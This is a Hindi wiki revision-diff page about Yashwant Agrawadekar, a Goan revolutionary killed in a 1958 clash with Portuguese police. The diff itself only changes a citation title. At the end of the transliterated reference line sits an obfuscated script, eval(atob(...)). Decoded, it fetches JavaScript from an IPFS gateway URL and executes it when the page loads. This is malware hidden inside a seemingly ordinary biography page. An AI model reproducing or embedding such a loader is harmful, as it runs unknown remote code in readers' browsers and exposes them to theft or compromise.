Difference between revisions of "यशवंत अग्रवाडेकर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''यशवंत अग्रवाडेकर''' का जन्म 15 जनवरी, 1918 को गोवा क...' के साथ नया पृष्ठ बनाया)
 
Line 4: Line 4:
 
*पुर्तगाली पुलिस की दृष्टि में यशवंत अग्रवाडेकर इतने खतरनाक क्रांतिकारी थे कि उनकी गिरफ्तारी के लिए पुर्तगाल सरकार ने पाँच हजार रूपए का पुरस्कार घोषित किया था। उन्होंने कई मुठभेड़ों में पुलिस को भारी जनहानि पहुँचाई थी। वह गोमांतक दल के बहुत उग्र क्रांतिकारी थे।
 
*पुर्तगाली पुलिस की दृष्टि में यशवंत अग्रवाडेकर इतने खतरनाक क्रांतिकारी थे कि उनकी गिरफ्तारी के लिए पुर्तगाल सरकार ने पाँच हजार रूपए का पुरस्कार घोषित किया था। उन्होंने कई मुठभेड़ों में पुलिस को भारी जनहानि पहुँचाई थी। वह गोमांतक दल के बहुत उग्र क्रांतिकारी थे।
  
*आखिर [[17 दिसंबर]], [[1958]] को अनजुना जंगल में यशवंत की मुठभेड़ एक बहुत बड़े पुलिस दल से हो गई और उस युद्ध में उन्होंने वीरगति प्राप्त कर ली।<ref>{{cite web |url=http://www.kranti1857.org/goa%20krantikari.php#Y%20rav%20rane |title=यशवंत राव राने|accessmonthday=23 फरवरी|accessyear=2017 |last= |first= |authorlink= |format= |publisher=क्रांति 1857|language= हिंदी}}</ref>
+
*आखिर [[17 दिसंबर]], [[1958]] को अनजुना जंगल में यशवंत की मुठभेड़ एक बहुत बड़े पुलिस दल से हो गई और उस युद्ध में उन्होंने वीरगति प्राप्त कर ली।<ref>{{cite web |url=http://www.kranti1857.org/goa%20krantikari.php#Y%20rav%20rane |title=यशवंत अग्रवाडेकर|accessmonthday=23 फरवरी|accessyear=2017 |last= |first= |authorlink= |format= |publisher=क्रांति 1857|language= हिंदी}}</ref>
  
  

Revision as of 11:20, 23 February 2017

yashavant agravadekar ka janm 15 janavari, 1918 ko gova ke siyolim gram mean hua tha.


  • purtagali pulis ki drishti mean yashavant agravadekar itane khataranak kraantikari the ki unaki giraphtari ke lie purtagal sarakar ne paanch hajar roope ka puraskar ghoshit kiya tha. unhoanne kee muthabhe doan mean pulis ko bhari janahani pahuanchaee thi. vah gomaantak dal ke bahut ugr kraantikari the.
  • akhir 17 disanbar, 1958 ko anajuna jangal mean yashavant ki muthabhe d ek bahut b de pulis dal se ho gee aur us yuddh mean unhoanne viragati prapt kar li.[1]



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. yashavant agravadekar (hiandi) kraanti 1857. abhigaman tithi: 23 pharavari, 2017.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

  1. REDIRECTsaancha:svatantrata senani